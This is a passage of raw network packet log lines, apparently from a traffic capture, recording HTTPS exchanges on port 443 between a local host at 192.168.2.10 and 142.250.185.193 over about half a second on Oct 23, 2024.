Oct 23, 2024 08:14:59.575571060 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.575578928 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.575756073 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.576522112 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.576555014 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.576684952 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.576684952 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.576690912 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.576756001 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.617027044 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.617084026 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.617136002 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.617136002 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.617147923 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.617187977 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.625022888 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.625045061 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.625256062 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.625262022 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.625601053 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.661319971 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.661348104 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.661428928 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.661442041 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.661495924 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.661628008 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.662561893 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.662586927 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.662635088 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.662645102 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.662663937 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.662759066 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.693118095 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.693146944 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.693259954 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.693259954 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.693274021 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.694247961 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.694318056 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.694363117 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.694370031 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.694638968 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.694638968 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.735666990 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.735697031 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.739283085 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.739294052 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.742593050 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.742615938 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.742652893 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.742652893 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.742661953 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.743350029 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.743350029 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.778146029 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.778171062 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.778217077 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.778234005 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.778279066 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.779189110 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.779206038 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.779288054 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.779295921 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.779346943 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.811817884 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.811841965 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.812594891 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.812612057 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.812654972 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.813023090 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.813041925 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.813116074 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.813116074 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.813127041 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.813169003 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.852854013 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.852880955 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.853029013 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.853040934 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.853079081 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.859777927 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.859806061 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.859882116 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.859885931 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.859925032 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.895544052 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.895584106 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.895730019 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.895739079 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.895797014 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.896387100 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.896403074 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.896693945 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.896702051 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.896826029 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.927656889 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.927681923 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.927788973 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.927798986 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.927839994 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.928587914 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.928613901 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.928663969 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.928669930 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.928703070 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.928864956 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.968741894 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.968767881 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.968900919 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.968919039 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.969069004 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.976758003 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.976775885 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.977030993 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:14:59.977055073 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:14:59.977205992 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.011215925 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.011238098 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.011389017 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.011404991 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.011528015 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.013034105 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.013053894 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.013173103 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.013180971 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.013262033 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.014183998 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.014199972 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.014282942 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.014297962 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.014417887 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.055447102 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055552959 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055617094 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055653095 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.055660009 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055697918 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.055733919 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055771112 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055828094 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.055835009 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055967093 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.055994987 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056005955 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056015968 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.056024075 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056358099 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056380033 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.056385040 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056408882 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.056411982 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056421995 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056482077 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.056488991 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056528091 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.056648016 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056782961 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056806087 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056828976 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.056835890 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.056889057 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.057090998 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057204962 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057228088 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.057234049 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057286024 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.057341099 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057424068 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057444096 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057593107 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.057600975 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.057924986 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.085923910 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.086013079 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.086071014 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.086071014 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.086083889 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.086147070 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.087331057 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.087460995 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.087541103 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.087548018 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.093559027 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.093703032 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.093750954 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.093774080 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.093780994 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.093805075 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.093911886 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.093969107 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.093976021 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094088078 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094147921 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.094155073 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094268084 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094293118 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094315052 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.094321966 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094371080 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.094479084 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094564915 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094610929 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.094616890 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094744921 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094768047 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094794035 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.094799995 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.094870090 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.094985962 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.095139027 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.095165014 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.095184088 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.095191002 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.095232964 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.128210068 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.128611088 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.128662109 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.128669977 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.128806114 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.128834963 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.128863096 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.128869057 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.128905058 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.129904985 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130048037 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130095005 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.130100965 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130127907 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130187988 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.130193949 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130459070 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130507946 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130532026 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.130537987 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130572081 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.130582094 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130745888 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130772114 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130780935 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.130786896 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.130831957 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.130837917 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131030083 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131077051 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.131083012 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131279945 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131337881 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.131345034 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131443977 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131473064 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.131488085 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.131493092 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.132360935 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.172743082 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.172847033 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.172904968 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.172913074 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.172971964 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173012972 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173019886 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173182011 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173208952 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173232079 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173238039 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173274994 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173302889 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173427105 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173501015 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173507929 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173625946 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173666000 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173674107 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173681021 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173718929 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173890114 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173945904 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.173979998 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.173988104 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174159050 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174201965 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.174210072 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174309969 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174351931 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.174360991 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174499989 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174530029 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174542904 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.174549103 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174700975 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.174705982 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174874067 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.174948931 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.174957037 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.203165054 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.203223944 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.203241110 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.203259945 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.203332901 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.203340054 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.204590082 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.204674959 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.204680920 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.204710007 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.204837084 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.204844952 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.210809946 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.210881948 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.210913897 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.210922003 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.210963964 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.210969925 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211000919 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211044073 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.211051941 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211154938 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211210966 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.211218119 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211451054 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211497068 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.211503983 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211632967 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211662054 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211683989 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.211692095 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211733103 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.211796999 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211920023 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.211960077 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.211966038 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.212054014 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.212100029 CEST	49778	443	192.168.2.10	142.250.185.193
Oct 23, 2024 08:15:00.212105989 CEST	443	49778	142.250.185.193	192.168.2.10
Oct 23, 2024 08:15:00.212217093 CEST	443	49778	142.250.185.193	192.168.2.10
